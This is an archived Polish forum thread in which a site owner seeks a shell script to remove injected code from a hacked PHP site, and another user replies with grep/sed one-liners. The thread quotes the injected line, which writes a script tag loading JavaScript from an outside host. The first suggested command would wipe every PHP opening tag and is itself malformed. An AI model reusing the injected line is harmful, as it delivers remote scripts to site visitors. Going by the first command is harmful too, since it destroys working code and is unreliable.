Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: skrypt do usuwania włamu
Forum PHP.pl > Forum > Serwery WWW > Apache
maraska
Witam,

Mam problem z bardzo rozległym włamem.
Podopisywało w plikach swoje własne <?php...".."...?> i robi brzydkie rzeczy.

Pytanie do koleżanek i kolegów, czy ma koś może gotowy skrypt shelowy , który wyszuka pliki zawierajace string w katalogu i podkatalogach i usunie ten string?
Pyton_000
jaki string

Coś w ten deseń:
Kod
grep -rl --colo=none '<?php' | sed -i -e 's/<?php//g'

Ale musisz przetestować i nie ręczę za rezultaty wink.gif
maraska
Dziękuję za starania.

Cały string/wstrzyknięcie to 275 linii kodu.
Napisałem skrypt w php ale jakoś nie działa. Nie wiem czy przez to że muszę w stringu chaszować uszy.
Na szybko wystarczyłoby mi wycięcięcie tego:
  1. echo \"<script type=\"text/javascript\" src=\"http://cvjm-wetzlar.de/whflfcrv.php?id=12827704\"></script>\";

Jak by wyglądał skrytp wycinający ten string we wszystkich plikach w lokalizacji np. /var/www/ ?
Czy wykonanie byłoby szybsze, gdyby najpierw wyszukał pliki z tym stringiem i tylko na nich by wycinał, bo podkatalogów i plików jest masa.
Pyton_000
To Ci usunie podany string w katalogu z krtórego odpalisz i podkatalogach

Kod
grep -rl --colo=none 'echo "<script type="text\/javascript" src="http:\/\/cvjm-wetzlar.de\/whflfcrv.php?id=12827704"><\/script>";' | xargs sed -i -e 's/echo "<script type="text\/javascript" src="http:\/\/cvjm-wetzlar.de\/whflfcrv.php?id=12827704"><\/script>";//g'
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2024 Invision Power Services, Inc.